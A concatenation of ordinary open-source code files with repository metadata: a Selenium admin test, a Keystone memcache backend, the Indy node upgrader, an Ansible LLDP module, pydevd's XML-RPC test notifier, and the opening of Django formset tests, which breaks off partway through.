driver.find_element_by_id("delete_users").click()
time.sleep(3)
driver.find_element_by_id("confirm_delete").click()
time.sleep(3)
###########################################
# 步骤3:弹出删除框,但是取消 & 单选删除
###########################################
driver.find_element_by_css_selector("input.form-control.input-sm").clear()
driver.find_element_by_css_selector("input.form-control.input-sm").send_keys("deleteadm")
time.sleep(5)
driver.find_element_by_xpath("/html/body/div[2]/div[2]/div/div/div[2]/"
"div[2]/div[2]/div/table/tbody/tr/td[6]/div/a[2]").click()
time.sleep(5)
driver.find_element_by_xpath("/html/body/div[2]/div[2]/div/div/div[4]/div[2]/div/div[3]/button[2]").click()
time.sleep(3)
driver.find_element_by_css_selector("input.form-control.input-sm").clear()
driver.find_element_by_css_selector("input.form-control.input-sm").send_keys("deleteadm")
time.sleep(5)
driver.find_element_by_xpath("/html/body/div[2]/div[2]/div/div/div[2]/"
"div[2]/div[2]/div/table/tbody/tr/td[6]/div/a[2]").click()
time.sleep(3)
driver.find_element_by_id("confirm_delete").click()
time.sleep(3)
driver.quit()
def tearDown(self):
self.driver.quit()
if __name__ == "__main__":
unittest.main()
| apache-2.0 |
HugoKuo/keystone-essex3 | keystone/backends/memcache/__init__.py | 2 | 2658 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import logging
from keystone.common import config
from keystone.backends.memcache import models
import keystone.utils as utils
import keystone.backends.api as top_api
import keystone.backends.models as top_models
import memcache
MODEL_PREFIX = 'keystone.backends.memcache.models.'
API_PREFIX = 'keystone.backends.memcache.api.'
MEMCACHE_SERVER = None
CACHE_TIME = 86400
def configure_backend(options):
hosts = options['memcache_hosts']
global MEMCACHE_SERVER
if not MEMCACHE_SERVER:
MEMCACHE_SERVER = Memcache_Server(hosts)
register_models(options)
global CACHE_TIME
CACHE_TIME = config.get_option(
options, 'cache_time', type='int', default=86400)
class Memcache_Server():
def __init__(self, hosts):
self.hosts = hosts
self.server = memcache.Client([self.hosts])
def set(self, key, value, expiry=CACHE_TIME):
"""
This method is used to set a new value
in the memcache server.
"""
self.server.set(key.encode('utf-8'), value, expiry)
def get(self, key):
"""
This method is used to retrieve a value
from the memcache server
"""
return self.server.get(key.encode('utf-8'))
def delete(self, key):
"""
This method is used to delete a value from the
memcached server. Lazy delete
"""
self.server.delete(key.encode('utf-8'))
def register_models(options):
"""Register Models and create properties"""
supported_memcache_models = ast.literal_eval(
options["backend_entities"])
for supported_memcache_model in supported_memcache_models:
model = utils.import_module(MODEL_PREFIX + supported_memcache_model)
top_models.set_value(supported_memcache_model, model)
if model.__api__ is not None:
model_api = utils.import_module(API_PREFIX + model.__api__)
top_api.set_value(model.__api__, model_api.get())
| apache-2.0 |
TechWritingWhiz/indy-node | indy_node/server/upgrader.py | 1 | 21223 | import os
from collections import deque
from datetime import datetime, timedelta
from functools import partial
from typing import Tuple, Union, Optional, Callable, Dict
import dateutil.parser
import dateutil.tz
from stp_core.common.log import getlogger
from plenum.common.constants import TXN_TYPE, VERSION, DATA, IDENTIFIER
from plenum.common.types import f
from plenum.server.has_action_queue import HasActionQueue
from indy_common.constants import ACTION, POOL_UPGRADE, START, SCHEDULE, \
CANCEL, JUSTIFICATION, TIMEOUT, REINSTALL, NODE_UPGRADE, IN_PROGRESS, FORCE
from indy_node.server.upgrade_log import UpgradeLog
from plenum.server import notifier_plugin_manager
from ledger.util import F
import asyncio
logger = getlogger()
class Upgrader(HasActionQueue):
defaultUpgradeTimeout = 10 # minutes
@staticmethod
def getVersion():
from indy_node.__metadata__ import __version__
return __version__
@staticmethod
def is_version_upgradable(old, new, reinstall: bool = False):
return (Upgrader.compareVersions(old, new) > 0) \
or (Upgrader.compareVersions(old, new) == 0) and reinstall
@staticmethod
def compareVersions(verA: str, verB: str) -> int:
if verA == verB:
return 0
def parse(x):
if x.endswith(".0"):
x = x[:-2]
return [int(num) for num in x.split(".")]
partsA = parse(verA)
partsB = parse(verB)
for a, b in zip(partsA, partsB):
if a > b:
return -1
if b > a:
return 1
lenA = len(list(partsA))
lenB = len(list(partsB))
if lenA > lenB:
return -1
if lenB > lenA:
return 1
return 0
@staticmethod
def get_upgrade_id(txn):
seq_no = txn.get(F.seqNo.name, '')
if txn.get(FORCE, None):
seq_no = ''
return '{}{}'.format(txn[f.REQ_ID.nm], seq_no)
@staticmethod
def get_timeout(timeout):
return timedelta(minutes=timeout).seconds
def __defaultLog(self, dataDir, config):
log = os.path.join(dataDir, config.upgradeLogFile)
return UpgradeLog(filePath=log)
def __init__(self,
nodeId,
nodeName,
dataDir,
config,
ledger,
upgradeLog: UpgradeLog = None,
upgradeFailedCallback: Callable = None,
upgrade_start_callback: Callable = None):
self.nodeId = nodeId
self.nodeName = nodeName
self.config = config
self.dataDir = dataDir
self.ledger = ledger
self.scheduledUpgrade = None # type: Tuple[str, int, str]
self._notifier = notifier_plugin_manager.PluginManager()
self._upgradeLog = upgradeLog if upgradeLog else \
self.__defaultLog(dataDir, config)
self._upgradeFailedCallback = \
upgradeFailedCallback if upgradeFailedCallback else lambda: None
self._upgrade_start_callback = \
upgrade_start_callback if upgrade_start_callback else lambda: None
self.retry_timeout = 5
self.retry_limit = 3
self.process_upgrade_log_for_first_run()
HasActionQueue.__init__(self)
def __repr__(self):
# Since nodeid can be null till pool ledger has not caught up
return self.nodeId or ''
def service(self):
return self._serviceActions()
def process_upgrade_log_for_first_run(self):
# whether upgrade was started before the Node restarted,
# that is whether Upgrade Log contains STARTED event
self._upgrade_started = self._is_upgrade_started()
if self._upgrade_started:
# append SUCCESS or FAIL to the Upgrade Log
self._update_upgrade_log_for_started_upgrade()
def _is_upgrade_started(self):
if not self.lastUpgradeEventInfo:
logger.debug('Node {} has no upgrade events'
.format(self.nodeName))
return False
(event_type, when, version, upgrade_id) = self.lastUpgradeEventInfo
if event_type != UpgradeLog.UPGRADE_STARTED:
logger.debug(
'Upgrade for node {} was not scheduled. Last event is {}:{}:{}:{}'.format(
self.nodeName, event_type, when, version, upgrade_id))
return False
return True
def _update_upgrade_log_for_started_upgrade(self):
(event_type, when, version, upgrade_id) = self.lastUpgradeEventInfo
if not self.didLastExecutedUpgradeSucceeded:
self._upgradeLog.appendFailed(when, version, upgrade_id)
self._upgrade_failed(version=version,
scheduled_on=when,
upgrade_id=upgrade_id,
external_reason=True)
return
self._upgradeLog.appendSucceeded(when, version, upgrade_id)
logger.info("Node '{}' successfully upgraded to version {}"
.format(self.nodeName, version))
self._notifier.sendMessageUponNodeUpgradeComplete(
"Upgrade of node '{}' to version {} scheduled on {} "
" with upgrade_id {} completed successfully"
.format(self.nodeName, version, when, upgrade_id))
def should_notify_about_upgrade_result(self):
# do not rely on NODE_UPGRADE txn in config ledger, since in some cases (for example, when
# we run POOL_UPGRADE with force=true), we may not have IN_PROGRESS NODE_UPGRADE in the ledger.
# send NODE_UPGRADE txn only if we were in Upgrade Started state at the very beginning (after Node restarted)
return self._upgrade_started
def notified_about_upgrade_result(self):
self._upgrade_started = False
def get_last_node_upgrade_txn(self, start_no: int = None):
return self.get_upgrade_txn(
lambda txn: txn[TXN_TYPE] == NODE_UPGRADE and txn[IDENTIFIER] == self.nodeId,
start_no=start_no,
reverse=True)
def get_upgrade_txn(self, predicate: Callable = None, start_no: int = None,
reverse: bool = False) -> Optional[Dict]:
def txn_filter(txn):
return not predicate or predicate(txn)
def traverse_end_condition(seq_no):
if reverse:
return seq_no > 0
return seq_no <= len(self.ledger)
inc = 1
init_start_no = 1
if reverse:
inc = -1
init_start_no = len(self.ledger)
seq_no = start_no if start_no is not None else init_start_no
while traverse_end_condition(seq_no):
txn = self.ledger.getBySeqNo(seq_no)
if txn_filter(txn):
return txn
seq_no += inc
return None
@property
def lastUpgradeEventInfo(self) -> Optional[Tuple[str, str, str, str]]:
"""
(event, when, version, upgrade_id) of last performed upgrade
:returns: (event, when, version, upgrade_id) or None if there were no upgrades
"""
last_event = self._upgradeLog.lastEvent
return last_event[1:] if last_event else None
# TODO: PoolConfig and Updater both read config ledger independently
def processLedger(self) -> None:
"""
Checks ledger for planned but not yet performed upgrades
and schedules upgrade for the most recent one
Assumption: Only version is enough to identify a release, no hash
checking is done
:return:
"""
logger.debug(
'{} processing config ledger for any upgrades'.format(self))
last_pool_upgrade_txn_start = self.get_upgrade_txn(
lambda txn: txn[TXN_TYPE] == POOL_UPGRADE and txn[ACTION] == START, reverse=True)
if last_pool_upgrade_txn_start:
logger.info('{} found upgrade START txn {}'.format(
self, last_pool_upgrade_txn_start))
last_pool_upgrade_txn_seq_no = last_pool_upgrade_txn_start[F.seqNo.name]
# searching for CANCEL for this upgrade submitted after START txn
last_pool_upgrade_txn_cancel = self.get_upgrade_txn(
lambda txn:
txn[TXN_TYPE] == POOL_UPGRADE and txn[ACTION] == CANCEL and
txn[VERSION] == last_pool_upgrade_txn_start[VERSION],
start_no=last_pool_upgrade_txn_seq_no + 1)
if last_pool_upgrade_txn_cancel:
logger.info('{} found upgrade CANCEL txn {}'.format(
self, last_pool_upgrade_txn_cancel))
return
self.handleUpgradeTxn(last_pool_upgrade_txn_start)
@property
def didLastExecutedUpgradeSucceeded(self) -> bool:
"""
Checks last record in upgrade log to find out whether it
is about scheduling upgrade. If so - checks whether current version
is equals to the one in that record
:returns: upgrade execution result
"""
lastEventInfo = self.lastUpgradeEventInfo
if lastEventInfo:
currentVersion = self.getVersion()
scheduledVersion = lastEventInfo[2]
return self.compareVersions(currentVersion, scheduledVersion) == 0
return False
def isScheduleValid(self, schedule, node_srvs, force) -> (bool, str):
"""
Validates schedule of planned node upgrades
:param schedule: dictionary of node ids and upgrade times
:param nodeSrvs: dictionary of node ids and services
:return: whether schedule valid
"""
# flag "force=True" ignore basic checks! only datetime format is
# checked
times = []
non_demoted_nodes = set([k for k, v in node_srvs.items() if v])
if not force and set(schedule.keys()) != non_demoted_nodes:
return False, 'Schedule should contain id of all nodes'
now = datetime.utcnow().replace(tzinfo=dateutil.tz.tzutc())
for dateStr in schedule.values():
try:
when = dateutil.parser.parse(dateStr)
if when <= now and not force:
return False, '{} is less than current time'.format(when)
times.append(when)
except ValueError:
return False, '{} cannot be parsed to a time'.format(dateStr)
if force:
return True, ''
times = sorted(times)
for i in range(len(times) - 1):
diff = (times[i + 1] - times[i]).seconds
if diff < self.config.MinSepBetweenNodeUpgrades:
return False, 'time span between upgrades is {} ' \
'seconds which is less than specified ' \
'in the config'.format(diff)
return True, ''
def handleUpgradeTxn(self, txn) -> None:
"""
Handles transaction of type POOL_UPGRADE
Can schedule or cancel upgrade to a newer
version at specified time
:param txn:
"""
FINALIZING_EVENT_TYPES = [
UpgradeLog.UPGRADE_SUCCEEDED, UpgradeLog.UPGRADE_FAILED]
if txn[TXN_TYPE] != POOL_UPGRADE:
return
logger.info("Node '{}' handles upgrade txn {}".format(
self.nodeName, txn))
action = txn[ACTION]
version = txn[VERSION]
justification = txn.get(JUSTIFICATION)
reinstall = txn.get(REINSTALL, False)
currentVersion = self.getVersion()
upgrade_id = self.get_upgrade_id(txn)
if action == START:
# forced txn could have partial schedule list
if self.nodeId not in txn[SCHEDULE]:
logger.info("Node '{}' disregards upgrade txn {}".format(
self.nodeName, txn))
return
last_event = self.lastUpgradeEventInfo
if last_event and last_event[3] == upgrade_id and last_event[0] in FINALIZING_EVENT_TYPES:
logger.info(
"Node '{}' has already performed an upgrade with upgrade_id {}. "
"Last recorded event is {}".format(
self.nodeName, upgrade_id, last_event))
return
when = txn[SCHEDULE][self.nodeId]
failTimeout = txn.get(TIMEOUT, self.defaultUpgradeTimeout)
if not self.is_version_upgradable(
currentVersion, version, reinstall):
return
if self.scheduledUpgrade:
if isinstance(when, str):
when = dateutil.parser.parse(when)
if self.scheduledUpgrade == (version, when, upgrade_id):
logger.debug("Node {} already scheduled upgrade to version '{}' ".format(
self.nodeName, version))
return
else:
logger.info(
"Node '{}' cancels previous upgrade and schedules a new one to {}".format(
self.nodeName, version))
self._cancelScheduledUpgrade(justification)
logger.info("Node '{}' schedules upgrade to {}".format(
self.nodeName, version))
self._scheduleUpgrade(
version, when, failTimeout, upgrade_id)
return
if action == CANCEL:
if self.scheduledUpgrade and self.scheduledUpgrade[0] == version:
self._cancelScheduledUpgrade(justification)
logger.info("Node '{}' cancels upgrade to {}".format(
self.nodeName, version))
return
logger.error(
"Got {} transaction with unsupported action {}".format(
POOL_UPGRADE, action))
def _scheduleUpgrade(self,
version,
when: Union[datetime, str],
failTimeout,
upgrade_id) -> None:
"""
Schedules node upgrade to a newer version
:param version: version to upgrade to
:param when: upgrade time
:param upgrade_id: upgrade identifier (req_id+seq_no) of a txn that started the upgrade
"""
assert isinstance(when, (str, datetime))
logger.info("{}'s upgrader processing upgrade for version {}"
.format(self, version))
if isinstance(when, str):
when = dateutil.parser.parse(when)
now = datetime.utcnow().replace(tzinfo=dateutil.tz.tzutc())
self._notifier.sendMessageUponNodeUpgradeScheduled(
"Upgrade of node '{}' to version {} has been scheduled on {}".format(
self.nodeName, version, when))
self._upgradeLog.appendScheduled(when, version, upgrade_id)
callAgent = partial(self._callUpgradeAgent, when,
version, failTimeout, upgrade_id)
delay = 0
if now < when:
delay = (when - now).total_seconds()
self.scheduledUpgrade = (version, when, upgrade_id)
self._schedule(callAgent, delay)
def _cancelScheduledUpgrade(self, justification=None) -> None:
"""
Cancels scheduled upgrade
:param when: time upgrade was scheduled to
:param version: version upgrade scheduled for
"""
if self.scheduledUpgrade:
why_prefix = ": "
why = justification
if justification is None:
why_prefix = ", "
why = "cancellation reason not specified"
(version, when, upgrade_id) = self.scheduledUpgrade
logger.info("Cancelling upgrade {upgrade_id}"
" of node {node}"
" to version {version}"
" scheduled on {when}"
"{why_prefix}{why}"
.format(upgrade_id=upgrade_id,
node=self.nodeName,
version=version,
when=when,
why_prefix=why_prefix,
why=why))
self._unscheduleUpgrade()
self._upgradeLog.appendCancelled(when, version, upgrade_id)
self._notifier.sendMessageUponPoolUpgradeCancel(
"Upgrade of node '{}' to version {} "
"has been cancelled due to {}".format(
self.nodeName, version, why))
def _unscheduleUpgrade(self):
"""
Unschedule current upgrade
Note that it does not add record to upgrade log and does not do
required steps to resume previous upgrade. If you need this - use
_cancelScheduledUpgrade
"""
self.aqStash = deque()
self.scheduledUpgrade = None
def _callUpgradeAgent(self, when, version, failTimeout,
upgrade_id) -> None:
"""
Callback which is called when upgrade time come.
Writes upgrade record to upgrade log and asks
node control service to perform upgrade
:param when: upgrade time
:param version: version to upgrade to
"""
logger.info("{}'s upgrader calling agent for upgrade".format(self))
self._upgradeLog.appendStarted(when, version, upgrade_id)
self._upgrade_start_callback()
self.scheduledUpgrade = None
asyncio.ensure_future(
self._sendUpdateRequest(when, version, upgrade_id, failTimeout))
async def _sendUpdateRequest(self, when, version, upgrade_id, failTimeout):
retryLimit = self.retry_limit
while retryLimit:
try:
msg = UpgradeMessage(version=version).toJson()
logger.info("Sending message to control tool: {}".format(msg))
await self._open_connection_and_send(msg)
break
except Exception as ex:
logger.warning("Failed to communicate to control tool: {}"
.format(ex))
asyncio.sleep(self.retry_timeout)
retryLimit -= 1
if not retryLimit:
self._upgrade_failed(version=version,
scheduled_on=when,
upgrade_id=upgrade_id,
reason="problems in communication with "
"node control service")
self._unscheduleUpgrade()
self._upgradeFailedCallback()
else:
logger.info("Waiting {} minutes for upgrade to be performed"
.format(failTimeout))
timesUp = partial(self._declareTimeoutExceeded, when, version, upgrade_id)
self._schedule(timesUp, self.get_timeout(failTimeout))
async def _open_connection_and_send(self, message: str):
controlServiceHost = self.config.controlServiceHost
controlServicePort = self.config.controlServicePort
msgBytes = bytes(message, "utf-8")
_, writer = await asyncio.open_connection(
host=controlServiceHost,
port=controlServicePort
)
writer.write(msgBytes)
writer.close()
def _declareTimeoutExceeded(self, when, version, upgrade_id):
"""
This function is called when time for upgrade is up
"""
logger.info("Timeout exceeded for {}:{}".format(when, version))
last = self._upgradeLog.lastEvent
if last and last[1:-1] == (UpgradeLog.UPGRADE_FAILED, when, version):
return None
self._upgrade_failed(version=version,
scheduled_on=when,
upgrade_id=upgrade_id,
reason="exceeded upgrade timeout")
self._unscheduleUpgrade()
self._upgradeFailedCallback()
def _upgrade_failed(self, *,
version,
scheduled_on,
upgrade_id,
reason=None,
external_reason=False):
if reason is None:
reason = "unknown reason"
error_message = "Node {node} failed upgrade {upgrade_id} to " \
"version {version} scheduled on {scheduled_on} " \
"because of {reason}" \
.format(node=self.nodeName,
upgrade_id=upgrade_id,
version=version,
scheduled_on=scheduled_on,
reason=reason)
logger.error(error_message)
if external_reason:
logger.error("This problem may have external reasons, "
"check syslog for more information")
self._notifier.sendMessageUponNodeUpgradeFail(error_message)
class UpgradeMessage:
"""
Data structure that represents request for node update
"""
def __init__(self, version: str):
self.version = version
def toJson(self):
import json
return json.dumps(self.__dict__)
| apache-2.0 |
nsg/ansible-modules-extras | network/lldp.py | 31 | 2795 | #!/usr/bin/python -tt
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import subprocess
DOCUMENTATION = '''
---
module: lldp
version_added: 1.6
short_description: get details reported by lldp
description:
- Reads data out of lldpctl
options: {}
author: "Andy Hill (@andyhky)"
notes:
- Requires lldpd running and lldp enabled on switches
'''
EXAMPLES = '''
# Retrieve switch/port information
- name: Gather information from lldp
lldp:
- name: Print each switch/port
debug: msg="{{ lldp[item]['chassis']['name'] }} / {{ lldp[item]['port']['ifalias'] }}
with_items: lldp.keys()
# TASK: [Print each switch/port] ***********************************************************
# ok: [10.13.0.22] => (item=eth2) => {"item": "eth2", "msg": "switch1.example.com / Gi0/24"}
# ok: [10.13.0.22] => (item=eth1) => {"item": "eth1", "msg": "switch2.example.com / Gi0/3"}
# ok: [10.13.0.22] => (item=eth0) => {"item": "eth0", "msg": "switch3.example.com / Gi0/3"}
'''
def gather_lldp():
cmd = ['lldpctl', '-f', 'keyvalue']
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)
(output, err) = proc.communicate()
if output:
output_dict = {}
lldp_entries = output.split("\n")
for entry in lldp_entries:
if entry.startswith('lldp'):
path, value = entry.strip().split("=", 1)
path = path.split(".")
path_components, final = path[:-1], path[-1]
else:
value = current_dict[final] + '\n' + entry
current_dict = output_dict
for path_component in path_components:
current_dict[path_component] = current_dict.get(path_component, {})
current_dict = current_dict[path_component]
current_dict[final] = value
return output_dict
def main():
module = AnsibleModule({})
lldp_output = gather_lldp()
try:
data = {'lldp': lldp_output['lldp']}
module.exit_json(ansible_facts=data)
except TypeError:
module.fail_json(msg="lldpctl command failed. is lldpd running?")
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
nabilbendafi/script.module.pydevd | lib/pydev_runfiles_xml_rpc.py | 11 | 10937 | import threading
import traceback
import warnings
from _pydev_filesystem_encoding import getfilesystemencoding
from pydev_imports import xmlrpclib, _queue
Queue = _queue.Queue
from pydevd_constants import *
#This may happen in IronPython (in Python it shouldn't happen as there are
#'fast' replacements that are used in xmlrpclib.py)
warnings.filterwarnings(
'ignore', 'The xmllib module is obsolete.*', DeprecationWarning)
file_system_encoding = getfilesystemencoding()
#=======================================================================================================================
# _ServerHolder
#=======================================================================================================================
class _ServerHolder:
'''
Helper so that we don't have to use a global here.
'''
SERVER = None
#=======================================================================================================================
# SetServer
#=======================================================================================================================
def SetServer(server):
_ServerHolder.SERVER = server
#=======================================================================================================================
# ParallelNotification
#=======================================================================================================================
class ParallelNotification(object):
def __init__(self, method, args):
self.method = method
self.args = args
def ToTuple(self):
return self.method, self.args
#=======================================================================================================================
# KillServer
#=======================================================================================================================
class KillServer(object):
pass
#=======================================================================================================================
# ServerFacade
#=======================================================================================================================
class ServerFacade(object):
def __init__(self, notifications_queue):
self.notifications_queue = notifications_queue
def notifyTestsCollected(self, *args):
self.notifications_queue.put_nowait(ParallelNotification('notifyTestsCollected', args))
def notifyConnected(self, *args):
self.notifications_queue.put_nowait(ParallelNotification('notifyConnected', args))
def notifyTestRunFinished(self, *args):
self.notifications_queue.put_nowait(ParallelNotification('notifyTestRunFinished', args))
def notifyStartTest(self, *args):
self.notifications_queue.put_nowait(ParallelNotification('notifyStartTest', args))
def notifyTest(self, *args):
new_args = []
for arg in args:
new_args.append(_encode_if_needed(arg))
args = tuple(new_args)
self.notifications_queue.put_nowait(ParallelNotification('notifyTest', args))
#=======================================================================================================================
# ServerComm
#=======================================================================================================================
class ServerComm(threading.Thread):
def __init__(self, notifications_queue, port, daemon=False):
threading.Thread.__init__(self)
self.setDaemon(daemon) # If False, wait for all the notifications to be passed before exiting!
self.finished = False
self.notifications_queue = notifications_queue
import pydev_localhost
# It is necessary to specify an encoding, that matches
# the encoding of all bytes-strings passed into an
# XMLRPC call: "All 8-bit strings in the data structure are assumed to use the
# packet encoding. Unicode strings are automatically converted,
# where necessary."
# Byte strings most likely come from file names.
encoding = file_system_encoding
if encoding == "mbcs":
# Windos symbolic name for the system encoding CP_ACP.
# We need to convert it into a encoding that is recognized by Java.
# Unfortunately this is not always possible. You could use
# GetCPInfoEx and get a name similar to "windows-1251". Then
# you need a table to translate on a best effort basis. Much to complicated.
# ISO-8859-1 is good enough.
encoding = "ISO-8859-1"
self.server = xmlrpclib.Server('http://%s:%s' % (pydev_localhost.get_localhost(), port),
encoding=encoding)
def run(self):
while True:
kill_found = False
commands = []
command = self.notifications_queue.get(block=True)
if isinstance(command, KillServer):
kill_found = True
else:
assert isinstance(command, ParallelNotification)
commands.append(command.ToTuple())
try:
while True:
command = self.notifications_queue.get(block=False) #No block to create a batch.
if isinstance(command, KillServer):
kill_found = True
else:
assert isinstance(command, ParallelNotification)
commands.append(command.ToTuple())
except:
pass #That's OK, we're getting it until it becomes empty so that we notify multiple at once.
if commands:
try:
self.server.notifyCommands(commands)
except:
traceback.print_exc()
if kill_found:
self.finished = True
return
#=======================================================================================================================
# InitializeServer
#=======================================================================================================================
def InitializeServer(port, daemon=False):
if _ServerHolder.SERVER is None:
if port is not None:
notifications_queue = Queue()
_ServerHolder.SERVER = ServerFacade(notifications_queue)
_ServerHolder.SERVER_COMM = ServerComm(notifications_queue, port, daemon)
_ServerHolder.SERVER_COMM.start()
else:
#Create a null server, so that we keep the interface even without any connection.
_ServerHolder.SERVER = Null()
_ServerHolder.SERVER_COMM = Null()
try:
_ServerHolder.SERVER.notifyConnected()
except:
traceback.print_exc()
#=======================================================================================================================
# notifyTest
#=======================================================================================================================
def notifyTestsCollected(tests_count):
assert tests_count is not None
try:
_ServerHolder.SERVER.notifyTestsCollected(tests_count)
except:
traceback.print_exc()
#=======================================================================================================================
# notifyStartTest
#=======================================================================================================================
def notifyStartTest(file, test):
'''
@param file: the tests file (c:/temp/test.py)
@param test: the test ran (i.e.: TestCase.test1)
'''
assert file is not None
if test is None:
test = '' #Could happen if we have an import error importing module.
try:
_ServerHolder.SERVER.notifyStartTest(file, test)
except:
traceback.print_exc()
def _encode_if_needed(obj):
# In the java side we expect strings to be ISO-8859-1 (org.python.pydev.debug.pyunit.PyUnitServer.initializeDispatches().new Dispatch() {...}.getAsStr(Object))
if not IS_PY3K:
if isinstance(obj, str):
try:
return xmlrpclib.Binary(obj.decode(sys.stdin.encoding).encode('ISO-8859-1', 'xmlcharrefreplace'))
except:
return xmlrpclib.Binary(obj)
elif isinstance(obj, unicode):
return xmlrpclib.Binary(obj.encode('ISO-8859-1', 'xmlcharrefreplace'))
else:
if isinstance(obj, str): # Unicode in py3
return xmlrpclib.Binary(obj.encode('ISO-8859-1', 'xmlcharrefreplace'))
elif isinstance(obj, bytes):
try:
return xmlrpclib.Binary(obj.decode(sys.stdin.encoding).encode('ISO-8859-1', 'xmlcharrefreplace'))
except:
return xmlrpclib.Binary(obj) #bytes already
return obj
#=======================================================================================================================
# notifyTest
#=======================================================================================================================
def notifyTest(cond, captured_output, error_contents, file, test, time):
'''
@param cond: ok, fail, error
@param captured_output: output captured from stdout
@param captured_output: output captured from stderr
@param file: the tests file (c:/temp/test.py)
@param test: the test ran (i.e.: TestCase.test1)
@param time: float with the number of seconds elapsed
'''
assert cond is not None
assert captured_output is not None
assert error_contents is not None
assert file is not None
if test is None:
test = '' #Could happen if we have an import error importing module.
assert time is not None
try:
captured_output = _encode_if_needed(captured_output)
error_contents = _encode_if_needed(error_contents)
_ServerHolder.SERVER.notifyTest(cond, captured_output, error_contents, file, test, time)
except:
traceback.print_exc()
#=======================================================================================================================
# notifyTestRunFinished
#=======================================================================================================================
def notifyTestRunFinished(total_time):
assert total_time is not None
try:
_ServerHolder.SERVER.notifyTestRunFinished(total_time)
except:
traceback.print_exc()
#=======================================================================================================================
# forceServerKill
#=======================================================================================================================
def forceServerKill():
_ServerHolder.SERVER_COMM.notifications_queue.put_nowait(KillServer())
| epl-1.0 |
oshanz/Learn-Django | tests/forms_tests/tests/test_formsets.py | 51 | 51180 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
from django.forms import (CharField, DateField, FileField, Form, IntegerField,
SplitDateTimeField, ValidationError, formsets)
from django.forms.formsets import BaseFormSet, formset_factory
from django.forms.util import ErrorList
from django.test import TestCase
class Choice(Form):
choice = CharField()
votes = IntegerField()
# FormSet allows us to use multiple instance of the same form on 1 page. For now,
# the best way to create a FormSet is by using the formset_factory function.
ChoiceFormSet = formset_factory(Choice)
class FavoriteDrinkForm(Form):
name = CharField()
class BaseFavoriteDrinksFormSet(BaseFormSet):
def clean(self):
seen_drinks = []
for drink in self.cleaned_data:
if drink['name'] in seen_drinks:
raise ValidationError('You may only specify a drink once.')
seen_drinks.append(drink['name'])
class EmptyFsetWontValidate(BaseFormSet):
def clean(self):
raise ValidationError("Clean method called")
# Let's define a FormSet that takes a list of favorite drinks, but raises an
# error if there are any duplicates. Used in ``test_clean_hook``,
# ``test_regression_6926`` & ``test_regression_12878``.
FavoriteDrinksFormSet = formset_factory(FavoriteDrinkForm,
formset=BaseFavoriteDrinksFormSet, extra=3)
# Used in ``test_formset_splitdatetimefield``.
class SplitDateTimeForm(Form):
when = SplitDateTimeField(initial=datetime.datetime.now)
SplitDateTimeFormSet = formset_factory(SplitDateTimeForm)
class FormsFormsetTestCase(TestCase):
def make_choiceformset(self, formset_data=None, formset_class=ChoiceFormSet,
total_forms=None, initial_forms=0, max_num_forms=0, **kwargs):
"""
Make a ChoiceFormset from the given formset_data.
The data should be given as a list of (choice, votes) tuples.
"""
kwargs.setdefault('prefix', 'choices')
kwargs.setdefault('auto_id', False)
if formset_data is None:
return formset_class(**kwargs)
if total_forms is None:
total_forms = len(formset_data)
def prefixed(*args):
args = (kwargs['prefix'],) + args
return '-'.join(args)
data = {
prefixed('TOTAL_FORMS'): str(total_forms),
prefixed('INITIAL_FORMS'): str(initial_forms),
prefixed('MAX_NUM_FORMS'): str(max_num_forms),
}
for i, (choice, votes) in enumerate(formset_data):
data[prefixed(str(i), 'choice')] = choice
data[prefixed(str(i), 'votes')] = votes
return formset_class(data, **kwargs)
def test_basic_formset(self):
# A FormSet constructor takes the same arguments as Form. Let's create a FormSet
# for adding data. By default, it displays 1 blank form. It can display more,
# but we'll look at how to do so later.
formset = self.make_choiceformset()
self.assertHTMLEqual(str(formset), """<input type="hidden" name="choices-TOTAL_FORMS" value="1" /><input type="hidden" name="choices-INITIAL_FORMS" value="0" /><input type="hidden" name="choices-MAX_NUM_FORMS" value="1000" />
<tr><th>Choice:</th><td><input type="text" name="choices-0-choice" /></td></tr>
<tr><th>Votes:</th><td><input type="number" name="choices-0-votes" /></td></tr>""")
# We treat FormSet pretty much like we would treat a normal Form. FormSet has an
# is_valid method, and a cleaned_data or errors attribute depending on whether all
# the forms passed validation. However, unlike a Form instance, cleaned_data and
# errors will be a list of dicts rather than just a single dict.
formset = self.make_choiceformset([('Calexico', '100')])
self.assertTrue(formset.is_valid())
self.assertEqual([form.cleaned_data for form in formset.forms], [{'votes': 100, 'choice': 'Calexico'}])
# If a FormSet was not passed any data, its is_valid and has_changed
# methods should return False.
formset = self.make_choiceformset()
self.assertFalse(formset.is_valid())
self.assertFalse(formset.has_changed())
def test_formset_validation(self):
# FormSet instances can also have an error attribute if validation failed for
# any of the forms.
formset = self.make_choiceformset([('Calexico', '')])
self.assertFalse(formset.is_valid())
self.assertEqual(formset.errors, [{'votes': ['This field is required.']}])
def test_formset_has_changed(self):
# FormSet instances has_changed method will be True if any data is
# passed to his forms, even if the formset didn't validate
blank_formset = self.make_choiceformset([('', '')])
self.assertFalse(blank_formset.has_changed())
# invalid formset test
invalid_formset = self.make_choiceformset([('Calexico', '')])
self.assertFalse(invalid_formset.is_valid())
self.assertTrue(invalid_formset.has_changed())
# valid formset test
valid_formset = self.make_choiceformset([('Calexico', '100')])
self.assertTrue(valid_formset.is_valid())
self.assertTrue(valid_formset.has_changed())
def test_formset_initial_data(self):
# We can also prefill a FormSet with existing data by providing an ``initial``
# argument to the constructor. ``initial`` should be a list of dicts. By default,
# an extra blank form is included.
initial = [{'choice': 'Calexico', 'votes': 100}]
